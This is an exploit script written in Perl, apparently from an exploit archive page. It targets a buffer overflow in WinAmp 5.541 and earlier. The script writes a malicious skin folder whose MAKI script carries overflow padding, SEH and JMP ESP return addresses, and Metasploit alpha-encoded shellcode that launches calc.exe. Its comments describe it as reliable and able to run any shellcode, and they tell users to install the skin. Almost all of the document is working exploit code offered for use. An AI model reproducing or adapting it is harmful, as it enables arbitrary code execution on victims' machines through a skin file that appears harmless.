winamp5541-overflow.txt

Posted on 05 March 2009

#!/usr/bin/perl # # WinAmp <= 5.541 Skin Universal Buffer Overflow Exploit # # Discovered and Exploited by SkD (skdrat@hotmail.com) # ----------------------------------------------------- # WinAmp = http://www.winamp.com # # Who doesn't use WinAmp? # # This was an 0day for sometime but with the release of # the new version 5.55, it fixed the buffer overflow vuln. # I made it universal and very reliable. # The vulnerability is a mixture of a standard buffer overflow # with a SEH overflow, so to make it more stable, # both of the scenarios will be exploited accordingly when one # is triggered with my exploit :). # The exploit can also run any shellcode (alpha) so this makes # it ever so useful. # # Instructions:- # -Run script. # -Copy the created exploit directory "SkD's Skin" to # "C:Program FilesWinAmpSkins" OR just install it. # -Choose the skin from WinAmp :) # # Enjoy it ladies and gents :) # # Shouts out to: -KkD # -InTeL # -Jayji # -str0ke # # Note: Author has no responsibility over the damage done with this! use strict; use warnings; my $skin_xml = "xEFxBBxBFx3Cx3Fx78x6Dx6Cx20x76x65x72x73x69x6Fx6Ex3Dx22x31x2Ex30x22x20x65x6Ex63x6Fx64x69x6Ex67x3D". "x22x55x54x46x2Dx38x22x20x73x74x61x6Ex64x61x6Cx6Fx6Ex65x3Dx22x79x65x73x22x3Fx3Ex0Dx0Ax0Dx0Ax3Cx57". "x69x6Ex61x6Dx70x41x62x73x74x72x61x63x74x69x6Fx6Ex4Cx61x79x65x72x20x76x65x72x73x69x6Fx6Ex3Dx22x31". "x2Ex33x34x22x3Ex0Dx0Ax09x3Cx73x6Bx69x6Ex69x6Ex66x6Fx3Ex0Dx0Ax09x09x3Cx76x65x72x73x69x6Fx6Ex3Ex31". "x2Ex32x3Cx2Fx76x65x72x73x69x6Fx6Ex3Ex0Dx0Ax09x09x3Cx6Ex61x6Dx65x3Ex42x65x6Ex74x6Fx3Cx2Fx6Ex61x6D". "x65x3Ex0Dx0Ax09x09x3Cx61x75x74x68x6Fx72x3Ex53x6Bx44x3Cx2Fx61x75x74x68x6Fx72x3Ex0Dx0Ax09x09x3Cx63". "x6Fx6Dx6Dx65x6Ex74x3Ex53x6Bx44x3Cx2Fx63x6Fx6Dx6Dx65x6Ex74x3Ex0Dx0Ax09x09x3Cx65x6Dx61x69x6Cx3Ex73". "x6Bx64x72x61x74x40x68x6Fx74x6Dx61x69x6Cx2Ex63x6Fx6Dx3Cx2Fx65x6Dx61x69x6Cx3Ex0Dx0Ax09x09x3Cx73x63". "x72x65x65x6Ex73x68x6Fx74x3Ex53x6Bx44x73x68x6Fx74x2Ex70x6Ex67x3Cx2Fx73x63x72x65x65x6Ex73x68x6Fx74". "x3Ex0Dx0Ax09x09x3Cx68x6Fx6Dx65x70x61x67x65x3Ex68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex53x6Bx44x2Ex63x6F". "x6Dx2Fx3Cx2Fx68x6Fx6Dx65x70x61x67x65x3Ex0Dx0Ax09x3Cx2Fx73x6Bx69x6Ex69x6Ex66x6Fx3Ex0Dx0Ax0Dx0Ax09". "x3Cx61x63x63x65x6Cx65x72x61x74x6Fx72x73x20x73x65x63x74x69x6Fx6Ex3Dx22x67x65x6Ex65x72x61x6Cx22x3E". "x0Dx0Ax09x09x3Cx61x63x63x65x6Cx65x72x61x74x6Fx72x20x62x69x6Ex64x3Dx22x41x6Cx74x2Bx46x22x20x61x63". "x74x69x6Fx6Ex3Dx22x4Dx45x4Ex55x48x4Fx54x4Bx45x59x5Fx46x49x4Cx45x22x20x2Fx3Ex0Dx0Ax09x09x3Cx61x63". "x63x65x6Cx65x72x61x74x6Fx72x20x62x69x6Ex64x3Dx22x41x6Cx74x2Bx50x22x20x61x63x74x69x6Fx6Ex3Dx22x4D". "x45x4Ex55x48x4Fx54x4Bx45x59x5Fx50x4Cx41x59x22x20x2Fx3Ex0Dx0Ax09x09x3Cx61x63x63x65x6Cx65x72x61x74". "x6Fx72x20x62x69x6Ex64x3Dx22x41x6Cx74x2Bx4Fx22x20x61x63x74x69x6Fx6Ex3Dx22x4Dx45x4Ex55x48x4Fx54x4B". "x45x59x5Fx4Fx50x54x49x4Fx4Ex53x22x20x2Fx3Ex0Dx0Ax09x09x3Cx61x63x63x65x6Cx65x72x61x74x6Fx72x20x62". "x69x6Ex64x3Dx22x41x6Cx74x2Bx49x22x20x61x63x74x69x6Fx6Ex3Dx22x4Dx45x4Ex55x48x4Fx54x4Bx45x59x5Fx56". "x49x45x57x22x20x2Fx3Ex0Dx0Ax09x09x3Cx61x63x63x65x6Cx65x72x61x74x6Fx72x20x62x69x6Ex64x3Dx22x41x6C". "x74x2Bx48x22x20x61x63x74x69x6Fx6Ex3Dx22x4Dx45x4Ex55x48x4Fx54x4Bx45x59x5Fx48x45x4Cx50x22x20x2Fx3E". "x0Dx0Ax09x3Cx2Fx61x63x63x65x6Cx65x72x61x74x6Fx72x73x3Ex0Dx0Ax0Dx0Ax09x3Cx61x63x63x65x6Cx65x72x61". "x74x6Fx72x73x20x73x65x63x74x69x6Fx6Ex3Dx22x6Ex6Fx72x6Dx61x6Cx22x3Ex0Dx0Ax09x09x09x3Cx61x63x63x65". "x6Cx65x72x61x74x6Fx72x20x62x69x6Ex64x3Dx22x73x70x61x63x65x22x20x61x63x74x69x6Fx6Ex3Dx22x53x48x4F". "x57x5Fx43x55x52x52x45x4Ex54x5Fx54x52x41x43x4Bx22x20x2Fx3Ex0Dx0Ax09x3Cx2Fx61x63x63x65x6Cx65x72x61". "x74x6Fx72x73x3Ex0Dx0Ax0Dx0Ax09x3Cx21x2Dx2Dx20x54x68x69x73x20x53x6Bx69x6Ex20x75x73x65x73x20x73x68". "x61x72x65x64x20x47x72x61x70x68x69x63x73x2Cx20x58x4Dx4Cx20x61x6Ex64x20x4Dx61x6Bx69x20x66x72x6Fx6D". "x20x27x42x69x67x20x42x65x6Ex74x6Fx27x20x2Dx2Dx3Ex0Dx0Ax0Dx0Ax09x3Cx73x63x72x69x70x74x73x3Ex0Dx0A". "x09x09x3Cx73x63x72x69x70x74x20x66x69x6Cx65x3Dx22x73x2Ex6Dx61x6Bx69x22x20x70x61x72x61x6Dx3Dx22x73". "x6Dx61x6Cx6Cx22x2Fx3Ex20x3Cx21x2Dx2Dx20x4Dx75x73x74x20x62x65x20x6Cx6Fx61x64x65x64x20x61x74x20x66". "x69x72x73x74x20x2Dx2Dx3Ex0Dx0Ax09x3Cx2Fx73x63x72x69x70x74x73x3Ex0Dx0Ax0Dx0Ax09x3Cx69x6Ex63x6Cx75". "x64x65x20x66x69x6Cx65x3Dx22x73x2Ex6Dx61x6Bx69x22x2Fx3Ex0Dx0Ax0Dx0Ax09x3Cx73x63x72x69x70x74x73x3E". "x0Dx0Ax09x09x3Cx73x63x72x69x70x74x20x66x69x6Cx65x3Dx22x73x2Ex6Dx61x6Bx69x22x20x70x61x72x61x6Dx3D". "x22x31x33x30x2Cx31x38x22x2Fx3Ex0Dx0Ax09x3Cx2Fx73x63x72x69x70x74x73x3Ex0Dx0Ax0Dx0Ax3Cx2Fx57x69x6E". "x61x6Dx70x41x62x73x74x72x61x63x74x69x6Fx6Ex4Cx61x79x65x72x3E"; my $maki_script1 = "x46x47x03x04x17x00x00x00x27x00x00x00x71x49x65x51x87x0Dx51x4Ax91xE3xA6xB5x32x35xF3xE7x64x0FxF5xD6". "xFAx93xB7x49x93xF1xBAx66xEFxAEx3Ex98x7BxC4x0DxE9x0Dx84xE7x4AxB0x2Cx04x0BxD2x75xF7xFCxB5x3Ax02xB2". "x4Dx43xA1x4BxBExAEx59x63x75x03xF3xC6x78x57xC6x87x43xE7xFEx49x85xF9x09xCCx53x2AxFDx56x65x36x60x38". "x1Bx46xA7x42xAAx75xD8x3Fx66x67xBFx73xF4x7Ax78xF4xBBxB2xF7x4Ex9CxFBxE7x4BxA9xBExA8x8Dx02x0Cx37x3A". "xBFx3Cx9Fx43x84xF1x86x88x5BxCFx1Ex36xB6x5Bx0Cx5DxE1x7Dx1Fx4BxA7x0Fx8Dx16x59x94x19x41x99xE1xE3x4E". "x36xC6xECx4Bx97xCDx78xBCx9Cx86x28xB0xE5x95xBEx45x72x20x91x41x93x5CxBBx5FxF9xF1x17xFDx4Ex6Dx90x60". "x7Ex53x2Ex48xB0x04xCCx94x61x88x56x72xC0xBCx3Ax40x22x6FxD6x4Bx8BxA4x10xC8x29x93x25x47x4Dx3ExAAx97". "xD0xF4xA8x4Fx81x7Bx0AxF2x2Ax45x49x83xFAxBBxE4x64xF4x81xD9x49xB0xC0xA8x5Bx2ExC3xBCxFDx3Fx5ExB6x62". "x5Ex37x8Dx40x8DxEAx76x81x4AxB9x1Bx77xBEx97x4FxCExB0x77x19x4Ex99x56xD4x98x33xC9x6Cx27x0Dx20xC2xA8". "xEBx51x2Ax4BxBAx7Fx5Dx4BxC6x5Dx4Cx71x38xBAx1Ex8Dx9Ex48x3Ex48xB9x60x8Dx1Fx43xC5xC4x05x40xC9x08x0F". "x39xAFx23x4Bx80xF3xB8xC4x8Fx7ExBBx59x72x86xAAxEFx0Ex31xFAx41xB7xDCx85xA9x52x5BxCBx4Bx44x32xFDx7D". "x51x37x7Cx4ExBFx40x82xAEx5Fx3AxDCx33x15xFAxB9x5Ax7Dx9Ax57x45xABxC8x65x57xA6xC6x7CxA9xCDxDDx8Ex69". "x1Ex8FxECx4Fx9Bx12xF9x44xF9x09xFFx45x27xCDx64x6Bx26x5Ax4Bx4Cx8Cx59xE6xA7x0CxF6x49x3AxE4x05xCBx6D". "xC4x8AxC2x48xB1x93x49xF0x91x0ExF5x4AxFFxCFxDCxB4xFEx81xCCx4Bx96x1Bx72x0FxD5xBEx0FxFFxE1x8CxE2x01". "x59xB0xD5x11x97x9FxE4xDEx6Fx51x76x0AxBDxF8xF0x80xA5x1BxA6x42xA0x93x32x36xA0x0Cx8Dx4Ax1Bx34x2Ex9B". "x98x6CxFAx40x8Bx85x0Cx1Bx6ExE8x94x05x71x9BxD5x36xFDx03xF8x4Ax97x95x05x02xB7xDBx26x7Ax10xF2xD5x7F". "xC4xACxDFx48xA6xA0x54x51x57x6CxDCx76x35xA5xBAxB5xB3x05xCBx4DxADxC1xE6x18xD2x8Fx68x96xC1xFEx29x61". "xB7xDAx51x4Dx91x65x01xCAx0Cx1Bx70xDBxF7x14x95xD5x36xEDxE8x45x98x0Fx3Fx4ExA0x52x2CxD9x82x4Bx3Bx9B". "x7Ax66x0Ex42x8FxFCx79x41x15x80x9Cx02x99x31xEDxC7x19x53x98x47x98x63x60xB1x5Ax29x8CxAAx4DxC1xBBxE2". "xF6x84x73x41xBDxB3xB2xEBx2Fx66x55x50x94x05xC0x73x1Fx96x1Bx40x9Bx1Bx67x24x27xACx41x65x12x00x00x00". "x01x01x00x00x11x00x67x65x74x52x75x6Ex74x69x6Dx65x56x65x72x73x69x6Fx6E"; my $maki_script2 = "x01x01x00x00x0Bx00x67x65x74x53x6Bx69x6Ex4Ex61x6Dx65x01x01x00x00x0Dx00x67x65x74x50x72x69x76x61x74". "x65x49x6Ex74x01x01x00x00x0Cx00x67x65x74x54x69x6Dx65x4Fx66x44x61x79x01x01x00x00x0Dx00x73x65x74x50". "x72x69x76x61x74x65x49x6Ex74x01x01x00x00x0Ax00x6Dx65x73x73x61x67x65x42x6Fx78x01x01x00x00x0Fx00x69". "x6Ex74x65x67x65x72x54x6Fx53x74x72x69x6Ex67x01x01x00x00x0Ex00x6Fx6Ex53x63x72x69x70x74x4Cx6Fx61x64". "x65x64x01x01x00x00x0Ex00x67x65x74x53x63x72x69x70x74x47x72x6Fx75x70x0Ax01x00x00x09x00x67x65x74x4F". "x62x6Ax65x63x74x01x01x00x00x0Dx00x6Fx6Ex53x65x74x58x75x69x50x61x72x61x6Dx01x01x00x00x08x00x73x74". "x72x6Cx6Fx77x65x72x01x01x00x00x0Fx00x73x74x72x69x6Ex67x54x6Fx49x6Ex74x65x67x65x72x14x01x00x00x07". "x00x73x65x74x54x65x78x74x16x01x00x00x0Bx00x73x65x74x58x6Dx6Cx70x61x72x61x6Dx14x01x00x00x0Dx00x6F". "x6Ex54x65x78x74x43x68x61x6Ex67x65x64x14x01x00x00x0Cx00x67x65x74x41x75x74x6Fx57x69x64x74x68x14x01". "x00x00x0Bx00x73x65x74x58x6Dx6Cx50x61x72x61x6Dx23x00x00x00x01x01x00x00x00x00x00x00x00x00x00x00x01". "x01x02x00x00x00x00x00x00x00x00x00x00x00x01x00x02x00x00x00x00x00x00x00x00x00x00x00x01x00x04x00x00". "x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x02x00x00x00x00x00x00x00x00x00x02x00x00x00xFFxFFx00". "x00x00x00x00x00x00x00x02x00x00x00x01x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00". "x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x02". "x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x88x13x00x00x00x00x00x00x00x00x06x00x00x00x00". "x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00". "x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00". "x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x14x01x00". "x00x00x00x00x00x00x00x00x00x01x00x14x01x00x00x00x00x00x00x00x00x00x00x01x00x16x01x00x00x00x00x00". "x00x00x00x00x00x01x00x0Ax01x00x00x00x00x00x00x00x00x00x00x01x00x02x00x00x00x00x00x00x00x00x00x00". "x00x01x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06". "x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00". "x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00". "x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00". "x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x0Dx00x00". "x00x07x00x00x00x0Cx00x72x75x6Ex74x69x6Dx65x63x68x65x63x6Bx0Cx00x00x00x15x00x54x68x69x73x20x73x63". "x72x69x70x74x20x72x65x71x75x69x72x65x73x20x0Dx00x00x00x1Fx00x57x69x6Ex61x6Dx70x20x35x2Ex35x34x20". "x28x73x6Bx69x6Ex20x76x65x72x73x69x6Fx6Ex20x31x2Ex33x34x29x0Ex00x00x00x05x00x45x72x72x6Fx72x0Fx00". "x00x00x00x00x11x00x00x00x05x00x44x45x42x55x47x18x00x00x00x04x00x74x65x78x74x19x00x00x00x05x00x6C". "x61x62x65x6Cx1Ax00x00x00x04x00x6Cx69x6Ex6Bx1Dx00x00x00x05x00x73x68x69x66x74x1Ex00x00x00x07x00x74". "x6Fx6Fx6Cx74x69x70x21x00x00x00x01x00x78x22x00x00x00x01x00x77x03x00x00x00x00x00x00x00x07x00x00x00". "x5Fx01x00x00x00x00x00x00x0Ax00x00x00xCCx01x00x00x14x00x00x00x0Fx00x00x00x7Bx02x00x00x1Bx03x00x00". "x01x03x00x00x00x01x00x00x00x00x18x00x00x00x00x30x02x01x03x00x00x00x01x04x00x00x00x0Cx01x03x00x00". "x00x01x05x00x00x00x0Ax51x10xB9x00x00x00x01x02x00x00x00x01x06x00x00x00x30x02x01x09x00x00x00x01x00". "x00x00x00x01x08x00x00x00x01x07x00x00x00x01x00x00x00x00x18x01x00x00x00x18x02x00x00x00x30x02x01x0A". "x00x00x00x01x00x00x00x00x18x03x00x00x00x30x02x01x0Ax00x00x00x01x09x00x00x00x41x01x0Bx00x00x00x0C". "x01x09x00x00x00x01x0Ax00x00x00x0Cx50x10x06x00x00x00x01x08x00x00x00x21x01x00x00x00x00x01x00x00x00". "x00x18x03x00x00x00x01x07x00x00x00x01x00x00x00x00x18x01x00x00x00x18x04x00x00x00x02x01x00x00x00x00". "x01x0Fx00x00x00x01x06x00x00x00x01x0Ex00x00x00x01x0Cx00x00x00x01x0Dx00x00x00x40x18x05x00x00x00x02". "x01x08x00x00x00x21x01x06x00x00x00x21x01x01x00x00x00x21x03x10x00x00x00x01x00x00x00x00x01x0Fx00x00". "x00x01x08x00x00x00x01x11x00x00x00x01x10x00x00x00x70x05x00x00x00x04x02x01x01x00x00x00x21x03x12x00". "x00x00x01x00x00x00x00x01x0Fx00x00x00x01x08x00x00x00x01x11x00x00x00x01x00x00x00x00x01x12x00x00x00". "x70x06x00x00x00x01x70x05x00x00x00x04x02x01x01x00x00x00x21x01x17x00x00x00x01x08x00x00x00x30x02x19". "x9CxFExFFxFFx11x06x00x00x00x01x01x00x00x00x21x01x16x00x00x00x01x00x00x00x00x70x08x00x00x00x00x30". "x02x01x13x00x00x00x01x16x00x00x00x01x18x00x00x00x70x09x00x00x00x01x30x02x01x14x00x00x00x01x16x00". "x00x00x01x19x00x00x00x70x09x00x00x00x01x30x02x01x15x00x00x00x01x16x00x00x00x01x1Ax00x00x00x70x09". "x00x00x00x01x30x02x01x01x00x00x00x21x03x1Bx00x00x00x03x1Cx00x00x00x01x02x00x00x00x10x06x00x00x00". "x01x01x00x00x00x21x01x00x00x00x00x01x1Bx00x00x00x70x0Bx00x00x00x01x01x1Dx00x00x00x08x10x17x00x00". "x00x01x17x00x00x00x01x00x00x00x00x01x1Cx00x00x00x70x0Cx00x00x00x01x30x02x01x00x00x00x00x01x1Bx00". "x00x00x70x0Bx00x00x00x01x01x19x00x00x00x08x10x11x00x00x00x01x14x00x00x00x01x1Cx00x00x00x70x0Dx00". "x00x00x01x02x01x00x00x00x00x01x1Bx00x00x00x70x0Bx00x00x00x01x01x1Ax00x00x00x08x10x16x00x00x00x01". "x15x00x00x00x01x1Cx00x00x00x01x1Ex00x00x00x70x0Ex00x00x00x02x02x01x01x00x00x00x21x03x1Fx00x00x00". "x01x02x00x00x00x10x06x00x00x00x01x01x00x00x00x21x01x20x00x00x00x01x14x00x00x00x70x10x00x00x00x00". "x01x17x00x00x00x40x30x02x01x13x00x00x00x01x00x00x00x00x01x20x00x00x00x70x06x00x00x00x01x01x21x00". "x00x00x70x11x00x00x00x02x02x01x13x00x00x00x01x00x00x00x00x01x20x00x00x00x4Cx70x06x00x00x00x01x01". "x22x00x00x00x70x11x00x00x00x02x02x01x01x00x00x00x21x02x01x01x00x00x00x21x02x01x01x00x00x00x21x02". "x01x01x00x00x00x21x02x01x01x00x00x00x21x02x01x01x00x00x00x21x02x01x01x00x00x00x21"; # win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com my $shellcode = "xebx03x59xebx05xe8xf8xffxffxffx49x49x48x49x49x49". "x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax41". "x58x30x41x31x50x41x42x6bx41x41x51x41x32x41x41x32". "x42x41x30x42x41x58x38x41x42x50x75x69x79x4bx4cx4d". "x38x70x44x55x50x45x50x75x50x6ex6bx77x35x67x4cx6c". "x4bx43x4cx45x55x74x38x55x51x58x6fx4ex6bx52x6fx45". "x48x4ex6bx43x6fx65x70x76x61x58x6bx50x49x4ex6bx36". "x54x4ex6bx75x51x4ax4ex56x51x6bx70x4cx59x6cx6cx6e". "x64x59x50x70x74x63x37x69x51x78x4ax56x6dx45x51x5a". "x62x78x6bx6cx34x67x4bx51x44x36x44x74x44x30x75x4d". "x35x6cx4bx31x4fx31x34x65x51x5ax4bx52x46x4cx4bx74". "x4cx62x6bx6cx4bx61x4fx77x6cx35x51x7ax4bx6cx4bx57". "x6cx4cx4bx37x71x5ax4bx4cx49x73x6cx77x54x47x74x38". "x43x50x31x6bx70x32x44x4ex6bx61x50x66x50x4fx75x6b". "x70x51x68x44x4cx6cx4bx77x30x36x6cx6ex6bx70x70x77". "x6cx6cx6dx6cx4bx50x68x73x38x6ax4bx74x49x6cx4bx4b". "x30x4cx70x63x30x73x30x45x50x4ex6bx45x38x35x6cx53". "x6fx35x61x4cx36x75x30x71x46x6dx59x4ax58x4bx33x4f". "x30x31x6bx70x50x43x58x61x6ex6ex38x4bx52x32x53x31". "x78x4cx58x4bx4ex4cx4ax46x6ex50x57x6bx4fx5ax47x50". "x63x31x71x30x6cx35x33x44x6ex63x55x44x38x35x35x37". "x70x41"; my $overflow1 = "x41" x 314; my $overflow2 = "x41" x 128; my $overflow3 = "x90" x 8; my $sehjmp = "xebx12x41x41"; my $sehret = "x11x10xf0x14"; #0x14f01011 POP, POP, RET WinAmp's aacPlusDecoder.w5s [Universal Address] my $eip = "xf8x99x01x12"; #0x120199F8 JMP ESP my $nopsled = "x90" x 12; print "[x] WinAmp <= 5.541 Skin Universal Buffer Overflow Exploit "; print "[x] Discovered and Exploited by SkD (skdrat@ hotmail.com) "; print "[x] Creating skin dir "; rmdir("SkD's Skin"); mkdir("SkD's Skin"); print "[x] Creating skin.xml file "; open(my $skin_xml_file, ">SkD's Skin\skin.xml"); print $skin_xml_file $skin_xml; close $skin_xml_file; print "[x] Creating malicious MAKI script "; open(my $maki_script_file, ">SkD's Skin\s.maki"); binmode $maki_script_file; print $maki_script_file $maki_script1. $overflow1.$sehjmp.$sehret.$overflow3.$eip.$nopsled.$shellcode.$overflow2. $maki_script2; close $maki_script_file; print "[x] Universal exploit created! ";

TOP

Malware :

None in database

Last 20

Exploits :

Last 20